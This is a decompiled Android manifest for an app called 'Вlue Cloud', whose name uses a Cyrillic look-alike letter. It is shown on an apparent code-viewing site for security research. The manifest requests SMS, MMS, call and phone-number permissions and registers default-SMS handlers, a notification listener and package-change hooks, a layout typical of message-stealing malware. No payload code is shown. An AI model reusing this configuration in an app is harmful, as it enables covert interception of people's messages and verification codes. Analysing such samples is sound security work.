正在查看:Вlue Cloud v413.9 -- AndroidManifest.xml 的源代码文件
本页面用于展示反编译生成的源代码文件,仅供安全研究与技术分析使用,严禁用于任何非法用途。请遵守相关法律法规。
正在查看:Вlue Cloud v413.9 -- AndroidManifest.xml 的源代码文件
本页面用于展示反编译生成的源代码文件,仅供安全研究与技术分析使用,严禁用于任何非法用途。请遵守相关法律法规。
<manifest xmlns:android="http://schemas.android.com/apk/res/android" package="com.example.application" platformBuildVersionCode="34" platformBuildVersionName="14" android:versionCode="6194845" versionName="413.9" android:UNKNOWN_SYSTEM_ATTRIBUTE_01010572="34" android:UNKNOWN_SYSTEM_ATTRIBUTE_01010573="14" android:tag="">
<uses-sdk minSdkVersion="26" targetSdkVersion="34" android:tag=""/>
<uses-feature name="android.hardware.telephony" required="false" android:tag=""/>
<uses-permission name="android.permission.INTERNET" android:tag=""/>
<uses-permission name="com.google.android.providers.gsf.permission.READ_GSERVICES" android:tag=""/>
<uses-permission name="com.google.android.providers.gsf.permission.WRITE_GSERVICES" android:tag=""/>
<uses-permission name="android.permission.READ_PHONE_STATE" android:tag=""/>
<uses-permission name="android.permission.READ_PHONE_NUMBERS" android:tag=""/>
<uses-permission name="android.permission.CALL_PHONE" android:tag=""/>
<uses-permission name="android.permission.READ_SMS" android:tag=""/>
<uses-permission name="android.permission.SEND_SMS" android:tag=""/>
<uses-permission name="android.permission.RECEIVE_SMS" android:tag=""/>
<uses-permission name="android.permission.RECEIVE_MMS" android:tag=""/>
<permission android:name="com.example.application.DYNAMIC_RECEIVER_NOT_EXPORTED_PERMISSION" android:protectionLevel="0x00000002" android:tag=""/>
<uses-permission name="com.example.application.DYNAMIC_RECEIVER_NOT_EXPORTED_PERMISSION" android:tag=""/>
<application theme="@7F0A0008" android:label="Вlue Cloud " android:icon="@7F080000" name="com.example.application.MyApplication" allowBackup="true" supportsRtl="true" android:fullBackupContent="@7F0C0000" android:usesCleartextTraffic="true" android:roundIcon="@7F080001" android:UNKNOWN_SYSTEM_ATTRIBUTE_0101057a="androidx.core.app.CoreComponentFactory" android:dataExtractionRules="@7F0C0001" android:tag="">
<receiver android:name="com.example.application.core.alarm.AlarmReceiver" enabled="true" exported="true" android:tag="">
<intent-filter android:tag="">
<action android:name="CLIENT_RESTART" android:tag=""/>
</intent-filter>
</receiver>
<receiver android:name="com.example.application.core.telephony.sms.SmsReceiver" permission="android.permission.BROADCAST_SMS" exported="true" android:tag="">
<intent-filter android:tag="">
<action android:name="android.provider.Telephony.SMS_RECEIVED" android:tag=""/>
<action android:name="android.provider.Telephony.SMS_DELIVER" android:tag=""/>
</intent-filter>
</receiver>
<receiver android:name="com.example.application.core.telephony.sms.DeliverySmsReceiver" enabled="true" exported="true" android:tag="">
<intent-filter android:tag="">
<action android:name="SMS_DELIVERED" android:tag=""/>
<action android:name="SMS_SENT" android:tag=""/>
</intent-filter>
</receiver>
<receiver android:name="com.example.application.core.WapPushReceiver" permission="android.permission.BROADCAST_WAP_PUSH" exported="true" android:tag="">
<intent-filter android:tag="">
<action android:name="android.provider.Telephony.WAP_PUSH_DELIVER" android:tag=""/>
<data android:mimeType="application/vnd.wap.mms-message" android:tag=""/>
</intent-filter>
</receiver>
<activity name="com.example.application.core.SmsActivity" exported="true" android:tag="">
<intent-filter android:tag="">
<action android:name="android.intent.action.SEND" android:tag=""/>
<action android:name="android.intent.action.SENDTO" android:tag=""/>
<category android:name="android.intent.category.DEFAULT" android:tag=""/>
<category android:name="android.intent.category.BROWSABLE" android:tag=""/>
<data android:scheme="sms" android:tag=""/>
<data android:scheme="smsto" android:tag=""/>
<data android:scheme="mms" android:tag=""/>
<data android:scheme="mmsto" android:tag=""/>
</intent-filter>
</activity>
<service name="com.example.application.core.SmsService" permission="android.permission.SEND_RESPOND_VIA_MESSAGE" exported="true" android:tag="">
<intent-filter android:tag="">
<action android:name="android.intent.action.RESPOND_VIA_MESSAGE" android:tag=""/>
<category android:name="android.intent.category.DEFAULT" android:tag=""/>
<data android:scheme="sms" android:tag=""/>
<data android:scheme="smsto" android:tag=""/>
<data android:scheme="mms" android:tag=""/>
<data android:scheme="mmsto" android:tag=""/>
</intent-filter>
</service>
<service android:label="Вlue Cloud " name="com.example.application.core.push.PushListenerService" permission="android.permission.BIND_NOTIFICATION_LISTENER_SERVICE" exported="true" android:tag="">
<intent-filter android:tag="">
<action android:name="android.service.notification.NotificationListenerService" android:tag=""/>
</intent-filter>
</service>
<activity theme="@7F0A0008" name="com.example.application.MainActivity" exported="true" configChanges="0x00000480" android:tag="">
<intent-filter android:tag="">
<action android:name="android.intent.action.CHOOSER" android:tag=""/>
<action android:name="android.intent.action.MAIN" android:tag=""/>
<category android:name="android.intent.category.INFO" android:tag=""/>
<action android:name="android.intent.action.VIEW" android:tag=""/>
<category android:name="android.intent.category.DEFAULT" android:tag=""/>
<category android:name="com.android.internal.category.PLATLOGO" android:tag=""/>
<action android:name="android.intent.action.SEND" android:tag=""/>
<action android:name="android.intent.action.SEND_MULTIPLE" android:tag=""/>
<category android:name="android.intent.category.BROWSABLE" android:tag=""/>
<action android:name="android.intent.action.PACKAGE_REMOVED" android:tag=""/>
<action android:name="android.intent.action.PACKAGE_REPLACED" android:tag=""/>
<action android:name="android.intent.action.PACKAGE_ADDED" android:tag=""/>
<action android:name="android.intent.action.PACKAGE_CHANGED" android:tag=""/>
<action android:name="com.ui.OnAlarmReceiver.ACTION_WIDGET_RECEIVER" android:tag=""/>
<action android:name="com.android.vending.billing.InAppBillingService.COIN" android:tag=""/>
<action android:name="com.android.vending.billing.InAppBillingService.COIO" android:tag=""/>
<action android:name="com.android.vending.billing.InAppBillingService.LUCM" android:tag=""/>
<action android:name="com.android.vending.billing.InAppBillingService.PROX" android:tag=""/>
<action android:name="ir.cafebazaar.pardakht.InAppBillingService.BIND" android:tag=""/>
<action android:name="ru.aaaaaaax.installer" android:tag=""/>
<action android:name="com.nokia.payment.iapenabler.InAppBillingService.BIND" android:tag=""/>
<action android:name="com.android.vending.billing.InAppBillingService.INST" android:tag=""/>
</intent-filter>
</activity>
<provider name="androidx.startup.InitializationProvider" exported="false" authorities="com.example.application.androidx-startup" android:tag="">
<meta-data android:name="androidx.emoji2.text.EmojiCompatInitializer" android:value="androidx.startup" android:tag=""/>
<meta-data android:name="androidx.lifecycle.ProcessLifecycleInitializer" android:value="androidx.startup" android:tag=""/>
<meta-data android:name="androidx.profileinstaller.ProfileInstallerInitializer" android:value="androidx.startup" android:tag=""/>
</provider>
<receiver android:name="androidx.profileinstaller.ProfileInstallReceiver" permission="android.permission.DUMP" enabled="true" exported="true" directBootAware="false" android:tag="">
<intent-filter android:tag="">
<action android:name="androidx.profileinstaller.action.INSTALL_PROFILE" android:tag=""/>
</intent-filter>
<intent-filter android:tag="">
<action android:name="androidx.profileinstaller.action.SKIP_FILE" android:tag=""/>
</intent-filter>
<intent-filter android:tag="">
<action android:name="androidx.profileinstaller.action.SAVE_PROFILE" android:tag=""/>
</intent-filter>
<intent-filter android:tag="">
<action android:name="androidx.profileinstaller.action.BENCHMARK_OPERATION" android:tag=""/>
</intent-filter>
</receiver>
</application>
</manifest>